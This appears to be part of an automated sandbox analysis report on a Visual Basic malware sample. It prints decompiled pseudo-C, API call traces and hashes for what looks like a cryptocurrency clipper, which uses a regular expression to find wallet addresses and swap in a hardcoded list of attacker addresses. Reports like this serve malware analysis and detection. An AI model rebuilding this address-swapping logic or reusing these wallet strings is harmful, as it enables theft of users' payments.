              				while(1) {
              					_v112 = _t120;
              					if(_t83 == 0) {
              						break;
              					}
              					_v120 = 2;
              					_push( &_v36);
              					_push( &_v120);
              					_push( &_v104);
              					L004013C4();
              					L004013DC();
              					_push( &_v68);
              					_push( &_v156);
              					_push( &_v164);
              					_push( &_v168);
              					_t83 =  &_v160;
              					_push(_t83);
              					L004013BE();
              				}
              				_v120 = 0x8002;
              				_push( &_v36);
              				_push( &_v120);
              				_t86 =  &_v104;
              				_push(_t86);
              				L004013B2();
              				_push(_t86);
              				L004013B8();
              				_v88 = _t86;
              				_push(0x413719);
              				_t87 =  &_v160;
              				_push(_t87);
              				L004013AC();
              				L0040132E();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				return _t87;
              			}

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00413562
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041356F
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041357D
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 00413596
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004135BB
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135E0
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135F5
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00413604
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00413625
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00413632
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 0041365B
              • __vbaVarAdd.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 0041367A
              • __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 00413684
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 004136A9
              • __vbaVarCmpGe.MSVBVM60(?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C3
              • __vbaBoolVar.MSVBVM60(00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C9
              • __vbaAryUnlock.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136E8
              • __vbaFreeObj.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136F3
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136FB
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413703
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 0041370B
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413713
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Late$EachMoveVarg$#716BoolCallNextNofreeUnlock
              • String ID: Execute$Global$IgnoreCase$Pattern$VBScript.RegExp$ipA
              • API String ID: 2326585221-2387940264
              • Opcode ID: 643d99d1d3b13c533012f1f17018a7637caf4a76c2b1fdb65942cb372b13392d
              • Instruction ID: 44e13f474ac131ec2766a0e247f5d10dce5a9c55b47689a37dba124691be3dba
              • Opcode Fuzzy Hash: 643d99d1d3b13c533012f1f17018a7637caf4a76c2b1fdb65942cb372b13392d
              • Instruction Fuzzy Hash: 4251F8B2C1021CAADB10EFA6CD85EDEB7BCBB09304F50027BE509B7591DB785A498F54
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 50%
              			E00412F1A(void* __ebx, void* __edi, void* __esi, signed int _a4) {
              				signed int _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				signed int _v40;
              				char _v44;
              				char _v48;
              				void* _v52;
              				intOrPtr _v60;
              				char _v68;
              				signed int _v72;
              				intOrPtr* _v84;
              				void* _t59;
              				void* _t61;
              				intOrPtr* _t62;
              				void* _t63;
              				void* _t66;
              				intOrPtr* _t67;
              				void* _t68;
              				void* _t70;
              				intOrPtr* _t71;
              				void* _t73;
              				intOrPtr* _t74;
              				signed int _t102;
              				signed int _t103;
              				intOrPtr* _t106;
              				char* _t107;
              				intOrPtr* _t108;
              				intOrPtr* _t109;
              				intOrPtr* _t110;
              				void* _t112;
              				void* _t114;
              				intOrPtr _t115;
              				intOrPtr _t121;
              				intOrPtr _t125;
              				intOrPtr _t128;
              
              				_t115 = _t114 - 0x14;
              				 *[fs:0x0] = _t115;
              				_v24 = _t115 - 0x4c;
              				_v20 = 0x401180;
              				_t102 = _a4;
              				_v16 = _t102 & 0x00000001;
              				_t103 = _t102 & 0xfffffffe;
              				_a4 = _t103;
              				_v12 = 0;
              				 *((intOrPtr*)( *_t103 + 4))(_t103, __edi, __esi, __ebx,  *[fs:0x0], 0x401256, _t112);
              				_v40 = 0;
              				_v44 = 0;
              				_v48 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v72 = 0;
              				L00401328();
              				_t59 =  *((intOrPtr*)( *_t103 + 0x6f8))(_t103,  &_v48,  &_v72);
              				if(_t59 < 0) {
              					_push(0x6f8);
              					_push(0x411ae8);
              					_push(_t103);
              					_push(_t59);
              					L00401322();
              				}
              				L0040135E();
              				if( !_v72 != 0) {
              					_push(1);
              					L0040138E();
              					_t121 =  *0x4193b8; // 0x211e8f4
              					if(_t121 == 0) {
              						_push(0x4193b8);
              						_push(0x411cb4);
              						L0040131C();
              					}
              					_t106 =  *0x4193b8; // 0x211e8f4
              					_t61 =  *((intOrPtr*)( *_t106 + 0x1c))(_t106,  &_v52);
              					asm("fclex");
              					if(_t61 >= 0) {
              						_t73 = 0x411ca4;
              					} else {
              						_push(0x1c);
              						_t73 = 0x411ca4;
              						_push(0x411ca4);
              						_push(_t106);
              						_push(_t61);
              						L00401322();
              					}
              					_t62 = _v52;
              					_v84 = _t62;
              					_v60 = 0x80020004;
              					_v68 = 0xa;
              					_t107 =  &_v68;
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					asm("movsd");
              					_t63 =  *((intOrPtr*)( *_t62 + 0x5c))(_t62,  &_v48);
              					asm("fclex");
              					if(_t63 < 0) {
              						_push(0x5c);
              						_push(0x411cc4);
              						_push(_v84);
              						_push(_t63);
              						L00401322();
              					}
              					_v48 = 0;
              					L0040136A();
              					L0040132E();
              					_t59 = E00416F91(_t73, 0, _t107,  &_v44); // executed
              					L0040136A();
              					_push(_v40);
              					_push(0x411cd8);
              					L00401316();
              					if(_t59 != 0) {
              						_push(0x96);
              						E00411A34();
              						L00401310();
              						_t125 =  *0x4193b8; // 0x211e8f4
              						if(_t125 == 0) {
              							_push(0x4193b8);
              							_push(0x411cb4);
              							L0040131C();
              						}
              						_t108 =  *0x4193b8; // 0x211e8f4
              						_t66 =  *((intOrPtr*)( *_t108 + 0x1c))(_t108,  &_v52);
              						asm("fclex");
              						if(_t66 < 0) {
              							_push(0x1c);
              							_push(_t73);
              							_push(_t108);
              							_push(_t66);
              							L00401322();
              						}
              						_t67 = _v52;
              						_t109 = _t67;
              						_t68 =  *((intOrPtr*)( *_t67 + 0x50))(_t67);
              						asm("fclex");
              						if(_t68 < 0) {
              							_push(0x50);
              							_push(0x411cc4);
              							_push(_t109);
              							_push(_t68);
              							L00401322();
              						}
              						L0040132E();
              						_t128 =  *0x4193b8; // 0x211e8f4
              						if(_t128 == 0) {
              							_push(0x4193b8);
              							_push(0x411cb4);
              							L0040131C();
              						}
              						_t110 =  *0x4193b8; // 0x211e8f4
              						_t70 =  *((intOrPtr*)( *_t110 + 0x1c))(_t110,  &_v52);
              						asm("fclex");
              						if(_t70 < 0) {
              							_push(0x1c);
              							_push(_t73);
              							_push(_t110);
              							_push(_t70);
              							L00401322();
              						}
              						_t71 = _v52;
              						_t74 = _t71;
              						_v60 = 0x80020004;
              						_v68 = 0xa;
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						asm("movsd");
              						_t59 =  *((intOrPtr*)( *_t71 + 0x60))(_t71, _v40);
              						asm("fclex");
              						if(_t59 < 0) {
              							_push(0x60);
              							_push(0x411cc4);
              							_push(_t74);
              							_push(_t59);
              							L00401322();
              						}
              						L0040132E();
              					}
              				}
              				L00401334();
              				_push(0x41319c);
              				L0040135E();
              				L0040135E();
              				return _t59;
              			}

              APIs
              • __vbaStrCopy.MSVBVM60 ref: 00412F79
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AE8,000006F8), ref: 00412F9F
              • __vbaFreeStr.MSVBVM60(00000000,?,00411AE8,000006F8), ref: 00412FAC
              • __vbaOnError.MSVBVM60(00000001), ref: 00412FBC
              • __vbaNew2.MSVBVM60(00411CB4,004193B8,00000001), ref: 00412FD3
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,0000001C), ref: 00412FF8
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411CC4,0000005C), ref: 00413041
              • __vbaStrMove.MSVBVM60(00000000,?,00411CC4,0000005C), ref: 0041304F
              • __vbaFreeObj.MSVBVM60(00000000,?,00411CC4,0000005C), ref: 00413057
              • __vbaStrMove.MSVBVM60(?), ref: 0041306A
              • __vbaStrCmp.MSVBVM60(00411CD8,?,?), ref: 00413077
              • __vbaSetSystemError.MSVBVM60(00000096,00411CD8,?,?), ref: 0041308E
              • __vbaNew2.MSVBVM60(00411CB4,004193B8,00000096,00411CD8,?,?), ref: 004130A5
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,0000001C), ref: 004130C5
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411CC4,00000050), ref: 004130E4
              • __vbaFreeObj.MSVBVM60(00000000,?,00411CC4,00000050), ref: 004130EC
              • __vbaNew2.MSVBVM60(00411CB4,004193B8), ref: 00413103
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,0000001C), ref: 00413123
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411CC4,00000060), ref: 0041315F
              • __vbaFreeObj.MSVBVM60(00000000,?,00411CC4,00000060), ref: 00413167
              • __vbaExitProc.MSVBVM60 ref: 0041316E
              • __vbaFreeStr.MSVBVM60(0041319C), ref: 0041318E
              • __vbaFreeStr.MSVBVM60(0041319C), ref: 00413196
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckHresult$Free$New2$ErrorMove$CopyExitProcSystem
              • String ID: BtcClipperDetector.exe
              • API String ID: 2571865993-3924913259
              • Opcode ID: b51833ed3c854faa6d4b86511cad1051b5816ff5f2f43e430832dbe74d11db7f
              • Instruction ID: f70cad0e261b250c6014bd71156ddb5250e24ff74257a947b8b2519a83c7025b
              • Opcode Fuzzy Hash: b51833ed3c854faa6d4b86511cad1051b5816ff5f2f43e430832dbe74d11db7f
              • Instruction Fuzzy Hash: F2617D71940218AFDB10EFA5CC46EDEBBB8BF58714F24402AF901B72E1DB7859418B69
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 244 40143c-401463 #100
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: #100
              • String ID:
              • API String ID: 1341478452-0
              • Opcode ID: ff19f2bfea4aa134e95db743a2abd2d217d4387ace469c5e3c416849b59bb1c9
              • Instruction ID: 77eea3aa0b90e4eb314ca2f42d8ffcd4982f8529a18642b6e1ff8deb93511ce2
              • Opcode Fuzzy Hash: ff19f2bfea4aa134e95db743a2abd2d217d4387ace469c5e3c416849b59bb1c9
              • Instruction Fuzzy Hash: 1CE0241A18F3C95ED707A7B54C61155BF304E1761071F42DBC195DB0E3C9A8094DCB27
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 583 416a06-416b74 #716 __vbaVarSetVar __vbaVarVargNofree __vbaVarLateMemSt * 3 __vbaVarMove __vbaVargVar __vbaVarLateMemCallLd __vbaVarSetVar __vbaForEachVar 584 416b79-416b7b 583->584 585 416b81-416bbf #617 __vbaVarMove __vbaVarTstEq 584->585 586 416f25-416f7f __vbaAryUnlock __vbaFreeObj __vbaFreeVar * 5 584->586 587 416bc1-416bca 585->587 588 416bcf-416bf0 __vbaVarTstEq 585->588 590 416ea4-416f20 __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr __vbaVarAdd __vbaVarMove __vbaNextEachVar 587->590 591 416c00-416c21 __vbaVarTstEq 588->591 592 416bf2-416bfb 588->592 590->584 593 416c31-416c52 __vbaVarTstEq 591->593 594 416c23-416c2c 591->594 592->590 595 416c58-416c79 __vbaVarTstEq 593->595 596 416e9b-416e9f 593->596 594->590 597 416c89-416caa __vbaVarTstEq 595->597 598 416c7b-416c84 595->598 596->590 599 416cba-416cdb __vbaVarTstEq 597->599 600 416cac-416cb5 597->600 598->590 601 416ceb-416d0c __vbaVarTstEq 599->601 602 416cdd-416ce6 599->602 600->590 603 416d1c-416d3d __vbaVarTstEq 601->603 604 416d0e-416d17 601->604 602->590 605 416d4d-416d6e __vbaVarTstEq 603->605 606 416d3f-416d48 603->606 604->590 607 416d70-416d79 605->607 608 416d7e-416d9f __vbaVarTstEq 605->608 606->590 607->590 609 416da1-416daa 608->609 610 416daf-416dd0 __vbaVarTstEq 608->610 609->590 611 416de0-416e01 __vbaVarTstEq 610->611 612 416dd2-416ddb 610->612 613 416e11-416e32 __vbaVarTstEq 611->613 614 416e03-416e0c 611->614 612->590 615 416e34-416e3d 613->615 616 416e3f-416e60 __vbaVarTstEq 613->616 614->590 615->590 617 416e62-416e6b 616->617 618 416e6d-416e8e __vbaVarTstEq 616->618 617->590 618->596 619 416e90-416e99 618->619 619->590
              C-Code - Quality: 34%
              			E00416A06(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				char _v36;
              				char _v52;
              				char _v68;
              				char _v84;
              				char _v88;
              				char _v104;
              				signed int _v112;
              				char _v120;
              				signed int _v136;
              				char _v156;
              				char _v172;
              				char _v176;
              				char _v180;
              				char _v184;
              				char _v208;
              				char* _t145;
              				char* _t152;
              				char* _t153;
              				char* _t157;
              				char* _t159;
              				char* _t161;
              				char* _t163;
              				char* _t165;
              				char* _t174;
              				char* _t176;
              				char* _t178;
              				char* _t180;
              				char* _t182;
              				char* _t184;
              				char* _t186;
              				char* _t188;
              				char* _t190;
              				char* _t192;
              				char* _t194;
              				char* _t196;
              				signed int _t223;
              				intOrPtr _t232;
              
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t232;
              				_v12 = _t232 - 0xbc;
              				_v8 = 0x401228;
              				_push(0);
              				_push(L"VBScript.RegExp");
              				_push( &_v104);
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v88 = 0;
              				_v104 = 0;
              				_v120 = 0;
              				_v136 = 0;
              				_v156 = 0;
              				_v172 = 0;
              				_v176 = 0;
              				_v180 = 0;
              				_v184 = 0;
              				L004012F2();
              				_push( &_v104);
              				_push( &_v52);
              				L004013EE();
              				L004013E2();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Pattern");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"IgnoreCase");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Global");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = 0;
              				_v120 = 2;
              				L004013DC();
              				_push( &_v208);
              				L004013D0();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_t223 = 1;
              				_push(_t223);
              				_push(L"Execute");
              				_push( &_v52);
              				_t145 =  &_v104;
              				_push(_t145);
              				L004013D6();
              				_push(_t145);
              				_push( &_v84);
              				L004013EE();
              				_push( &_v84);
              				_push( &_v68);
              				_push( &_v156);
              				_push( &_v180);
              				_push( &_v184);
              				_t152 =  &_v176;
              				_push(_t152);
              				L004013CA();
              				while(_t152 != 0) {
              					_push(2);
              					_push( &_v68);
              					_push( &_v104);
              					L004013A6();
              					L004013DC();
              					_v112 = 0x412674;
              					_push( &_v172);
              					_t157 =  &_v120;
              					_push(_t157);
              					_v120 = 0x8008;
              					L00401346();
              					if(_t157 == 0) {
              						_v112 = 0x412680;
              						_push( &_v172);
              						_t159 =  &_v120;
              						_push(_t159);
              						_v120 = 0x8008;
              						L00401346();
              						if(_t159 == 0) {
              							_v112 = 0x41268c;
              							_push( &_v172);
              							_t161 =  &_v120;
              							_push(_t161);
              							_v120 = 0x8008;
              							L00401346();
              							if(_t161 == 0) {
              								_v112 = 0x412698;
              								_push( &_v172);
              								_t163 =  &_v120;
              								_push(_t163);
              								_v120 = 0x8008;
              								L00401346();
              								if(_t163 != 0) {
              									L33:
              									_push(0);
              									_push(0xffffffff);
              									_push(_t223);
              									_push(L"DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5");
              								} else {
              									_v112 = 0x4126a4;
              									_push( &_v172);
              									_t174 =  &_v120;
              									_push(_t174);
              									_v120 = 0x8008;
              									L00401346();
              									if(_t174 == 0) {
              										_v112 = 0x4126b0;
              										_push( &_v172);
              										_t176 =  &_v120;
              										_push(_t176);
              										_v120 = 0x8008;
              										L00401346();
              										if(_t176 == 0) {
              											_v112 = 0x4126bc;
              											_push( &_v172);
              											_t178 =  &_v120;
              											_push(_t178);
              											_v120 = 0x8008;
              											L00401346();
              											if(_t178 == 0) {
              												_v112 = 0x4126c8;
              												_push( &_v172);
              												_t180 =  &_v120;
              												_push(_t180);
              												_v120 = 0x8008;
              												L00401346();
              												if(_t180 == 0) {
              													_v112 = 0x4126d4;
              													_push( &_v172);
              													_t182 =  &_v120;
              													_push(_t182);
              													_v120 = 0x8008;
              													L00401346();
              													if(_t182 == 0) {
              														_v112 = 0x4126e0;
              														_push( &_v172);
              														_t184 =  &_v120;
              														_push(_t184);
              														_v120 = 0x8008;
              														L00401346();
              														if(_t184 == 0) {
              															_v112 = 0x4126ec;
              															_push( &_v172);
              															_t186 =  &_v120;
              															_push(_t186);
              															_v120 = 0x8008;
              															L00401346();
              															if(_t186 == 0) {
              																_v112 = 0x4126f8;
              																_push( &_v172);
              																_t188 =  &_v120;
              																_push(_t188);
              																_v120 = 0x8008;
              																L00401346();
              																if(_t188 == 0) {
              																	_v112 = 0x412704;
              																	_push( &_v172);
              																	_t190 =  &_v120;
              																	_push(_t190);
              																	_v120 = 0x8008;
              																	L00401346();
              																	if(_t190 == 0) {
              																		_v112 = 0x412710;
              																		_push( &_v172);
              																		_t192 =  &_v120;
              																		_push(_t192);
              																		_v120 = 0x8008;
              																		L00401346();
              																		if(_t192 == 0) {
              																			_v112 = 0x41271c;
              																			_push( &_v172);
              																			_t194 =  &_v120;
              																			_push(_t194);
              																			_v120 = 0x8008;
              																			L00401346();
              																			if(_t194 == 0) {
              																				_v112 = 0x412728;
              																				_push( &_v172);
              																				_t196 =  &_v120;
              																				_push(_t196);
              																				_v120 = 0x8008;
              																				L00401346();
              																				if(_t196 == 0) {
              																					goto L33;
              																				} else {
              																					_push(0);
              																					_push(0xffffffff);
              																					_push(_t223);
              																					_push(L"DUKBGpgmBJCCrQqS3b5VpDVKCK8xvxKb2h");
              																				}
              																			} else {
              																				_push(0);
              																				_push(0xffffffff);
              																				_push(_t223);
              																				_push(L"DTbuVWrVPsUtj3C2eby86WRcybtD4GBtPA");
              																			}
              																		} else {
              																			_push(0);
              																			_push(0xffffffff);
              																			_push(_t223);
              																			_push(L"DSMKvqbsKgmBQECicFVsrEUyd3zHa5RSip");
              																		}
              																	} else {
              																		_push(0);
              																		_push(0xffffffff);
              																		_push(_t223);
              																		_push(L"DPQBHQggTDv19PChkWXRcxMRPahhPVCa8L");
              																	}
              																} else {
              																	_push(0);
              																	_push(0xffffffff);
              																	_push(_t223);
              																	_push(L"DNnSUpUEk34iuf4fKipqGRrDdx4gtnBAxC");
              																}
              															} else {
              																_push(0);
              																_push(0xffffffff);
              																_push(_t223);
              																_push(L"DLYtRmHKE83Dppm7gT7yxgx7n8NsLQACGx");
              															}
              														} else {
              															_push(0);
              															_push(0xffffffff);
              															_push(_t223);
              															_push(L"DKnnMt7v5FJkjs38c6zdbR5s6LuoMvLcmq");
              														}
              													} else {
              														_push(0);
              														_push(0xffffffff);
              														_push(_t223);
              														_push(L"DFp6KBk3do226tJbZ565k2R6iL29gHwyBg");
              													}
              												} else {
              													_push(0);
              													_push(0xffffffff);
              													_push(_t223);
              													_push(L"DExYSfngpBw6yGPrPuL7TxTrDxvPMbnKFm");
              												}
              											} else {
              												_push(0);
              												_push(0xffffffff);
              												_push(_t223);
              												_push(L"DDvCUpZMkKJZA26HkwhqTTEKxbyUZ3h3Fb");
              											}
              										} else {
              											_push(0);
              											_push(0xffffffff);
              											_push(_t223);
              											_push(L"DCVFpRb9XWZZuYD9f3PZwKUAL8Ho6ahagN");
              										}
              									} else {
              										_push(0);
              										_push(0xffffffff);
              										_push(_t223);
              										_push(L"DBH6uXwvHiepeRMCPDfWWpE63vVmCygE6c");
              									}
              								}
              							} else {
              								_push(0);
              								_push(0xffffffff);
              								_push(_t223);
              								_push(L"D8onfxEYEcRGNna4jEpRVXdYFdMFFtCmu3");
              							}
              						} else {
              							_push(0);
              							_push(0xffffffff);
              							_push(_t223);
              							_push(L"D7FcMy6HGH5RdLcvB6TFXjT4m6BYN12uJo");
              						}
              					} else {
              						_push(0);
              						_push(0xffffffff);
              						_push(_t223);
              						_push(L"D6sJqG8JFDH8kmoWNJyKRfYt4chwWEGnu9");
              					}
              					_push( &_v68);
              					_t165 =  &_v88;
              					_push(_t165);
              					L0040139A();
              					_push(_t165);
              					_push( *0x419028);
              					L004013A0();
              					L0040136A();
              					L0040135E();
              					 *0x419024 =  *0x419024 | 0x0000ffff;
              					_push( &_v36);
              					_push( &_v120);
              					_push( &_v104);
              					_v112 = _t223;
              					_v120 = 2;
              					L004013C4();
              					L004013DC();
              					_push( &_v68);
              					_push( &_v156);
              					_push( &_v180);
              					_push( &_v184);
              					_t152 =  &_v176;
              					_push(_t152);
              					L004013BE();
              				}
              				_push(0x416f80);
              				_t153 =  &_v176;
              				_push(_t153);
              				L004013AC();
              				L0040132E();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				L00401352();
              				return _t153;
              			}

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416A76
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416A83
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416A91
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 00416AAA
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 00416ACF
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416AF4
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416B09
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416B18
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00416B39
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00416B46
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00416B6F
              • #617.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416B8B
              • __vbaVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416B99
              • __vbaVarTstEq.MSVBVM60(00000002,?,?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416BB7
              • __vbaVarTstEq.MSVBVM60(00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,?,00000000), ref: 00416BE8
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?,?,?,?,?), ref: 00416C19
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?,?,?), ref: 00416C4A
              • __vbaVarTstEq.MSVBVM60(00008008,?,00008008,?,00008008,?,00008008,?,00000002,?,?,?,00000002,?,?,?), ref: 00416C71
              • __vbaStrVarVal.MSVBVM60(?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?,?), ref: 00416EAC
              • #712.MSVBVM60(00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?), ref: 00416EB8
              • __vbaStrMove.MSVBVM60(00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?), ref: 00416EC1
              • __vbaFreeStr.MSVBVM60(00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?,00000002,?,?), ref: 00416EC9
              • __vbaVarAdd.MSVBVM60(?,00008008,?,00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?), ref: 00416EEC
              • __vbaVarMove.MSVBVM60(?,00008008,?,00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008,?,00008008,?,00008008,?), ref: 00416EF6
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00008008,?,00000000,?,?,DAzXcVkaHGgYPpdz8irFB2PcvtoLP87bs5,00000001,000000FF,00000000,00008008), ref: 00416F1B
              • __vbaAryUnlock.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F44
              • __vbaFreeObj.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F4F
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F5A
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F62
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F6A
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F72
              • __vbaFreeVar.MSVBVM60(?,00416F80,?,?,?,?,?,?,?,00000000), ref: 00416F7A
              Strings
              • DCVFpRb9XWZZuYD9f3PZwKUAL8Ho6ahagN, xrefs: 00416CB0
              • DBH6uXwvHiepeRMCPDfWWpE63vVmCygE6c, xrefs: 00416C7F
              • DUKBGpgmBJCCrQqS3b5VpDVKCK8xvxKb2h, xrefs: 00416E94
              • D6sJqG8JFDH8kmoWNJyKRfYt4chwWEGnu9, xrefs: 00416BC5
              • DLYtRmHKE83Dppm7gT7yxgx7n8NsLQACGx, xrefs: 00416DA5
              • IgnoreCase, xrefs: 00416AC8
              • D7FcMy6HGH5RdLcvB6TFXjT4m6BYN12uJo, xrefs: 00416BF6
